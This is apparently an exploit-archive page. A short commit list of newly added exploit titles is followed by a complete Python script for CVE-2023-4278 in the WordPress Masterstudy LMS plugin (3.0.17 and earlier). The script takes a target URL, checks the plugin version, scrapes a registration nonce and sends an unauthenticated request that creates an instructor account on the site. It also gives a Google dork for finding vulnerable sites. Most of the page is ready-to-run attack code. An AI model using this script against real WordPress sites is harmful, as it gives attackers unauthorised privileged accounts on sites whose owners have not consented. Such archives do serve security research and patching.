f3649a641f
24 changes to exploits/shellcodes/ghdb Minio 2022-07-29T19-40-48Z - Path traversal Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service Atcom 2.7.x.x - Authenticated Command Injection Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE) Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction OpenPLC WebServer 3 - Denial of Service Splunk 9.0.5 - admin account take over BoidCMS v2.0.0 - authenticated file upload vulnerability Cacti 1.2.24 - Authenticated command injection when using SNMP options Chitor-CMS v1.1.2 - Pre-Auth SQL Injection Clcknshop 1.0.0 - SQL Injection Coppermine Gallery 1.6.25 - RCE Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) GLPI GZIP(Py3) 9.4.5 - RCE Limo Booking Software v1.0 - CORS Media Library Assistant Wordpress Plugin - RCE and LFI Online ID Generator 1.0 - Remote Code Execution (RCE) Shuttle-Booking-Software v1.0 - Multiple-SQLi Webedition CMS v2.9.8.8 - Blind SSRF WEBIGniter v28.7.23 File Upload - Remote Code Execution Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation Wordpress Sonaar Music Plugin 4.7 - Stored XSS Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)
100 lines
No EOL
3.5 KiB
Python
Executable file
100 lines
No EOL
3.5 KiB
Python
Executable file
# Exploit Title: Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
|
|
# Google Dork: inurl:/user-public-account
|
|
# Date: 2023-09-04
|
|
# Exploit Author: Revan Arifio
|
|
# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/
|
|
# Version: <= 3.0.17
|
|
# Tested on: Windows, Linux
|
|
# CVE : CVE-2023-4278
|
|
|
|
import requests
|
|
import os
|
|
import re
|
|
import time
|
|
|
|
banner = """
|
|
_______ ________ ___ ___ ___ ____ _ _ ___ ______ ___
|
|
/ ____\ \ / / ____| |__ \ / _ \__ \|___ \ | || |__ \____ / _ \
|
|
| | \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) | / / (_) |
|
|
| | \ \/ / | __|______/ /| | | |/ / |__ <______|__ _/ / / / > _ <
|
|
| |____ \ / | |____ / /_| |_| / /_ ___) | | |/ /_ / / | (_) |
|
|
\_____| \/ |______| |____|\___/____|____/ |_|____/_/ \___/
|
|
|
|
======================================================================================================
|
|
|| Title : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation ||
|
|
|| Author : https://github.com/revan-ar ||
|
|
|| Vendor Homepage : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/ ||
|
|
|| Support : https://www.buymeacoffee.com/revan.ar ||
|
|
======================================================================================================
|
|
|
|
"""
|
|
|
|
|
|
print(banner)
|
|
|
|
# get nonce
|
|
def get_nonce(target):
|
|
open_target = requests.get("{}/user-public-account".format(target))
|
|
search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
|
|
if search_nonce[1] != None:
|
|
return search_nonce[1]
|
|
else:
|
|
print("Failed when getting Nonce :p")
|
|
|
|
|
|
|
|
# privielege escalation
|
|
def privesc(target, nonce, username, password, email):
|
|
|
|
req_data = {
|
|
"user_login":"{}".format(username),
|
|
"user_email":"{}".format(email),
|
|
"user_password":"{}".format(password),
|
|
"user_password_re":"{}".format(password),
|
|
"become_instructor":True,
|
|
"privacy_policy":True,
|
|
"degree":"",
|
|
"expertize":"",
|
|
"auditory":"",
|
|
"additional":[],
|
|
"additional_instructors":[],
|
|
"profile_default_fields_for_register":[],
|
|
"redirect_page":"{}/user-account/".format(target)
|
|
}
|
|
|
|
start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)
|
|
|
|
if start.status_code == 200:
|
|
print("[+] Exploit Success !!")
|
|
else:
|
|
print("[+] Exploit Failed :p")
|
|
|
|
|
|
|
|
# URL target
|
|
target = input("[+] URL Target: ")
|
|
print("[+] Starting Exploit")
|
|
plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
|
|
plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
|
|
int_version = plugin_version[1].replace(".", "")
|
|
time.sleep(1)
|
|
|
|
if int(int_version) < 3018:
|
|
print("[+] Target is Vulnerable !!")
|
|
# Credential
|
|
email = input("[+] Email: ")
|
|
username = input("[+] Username: ")
|
|
password = input("[+] Password: ")
|
|
time.sleep(1)
|
|
print("[+] Getting Nonce...")
|
|
get_nonce = get_nonce(target)
|
|
# Get Nonce
|
|
if get_nonce != None:
|
|
print("[+] Success Getting Nonce: {}".format(get_nonce))
|
|
time.sleep(1)
|
|
# Start PrivEsc
|
|
privesc(target, get_nonce, username, password, email)
|
|
# ----------------------------------
|
|
|
|
else:
|
|
print("[+] Target is NOT Vulnerable :p") |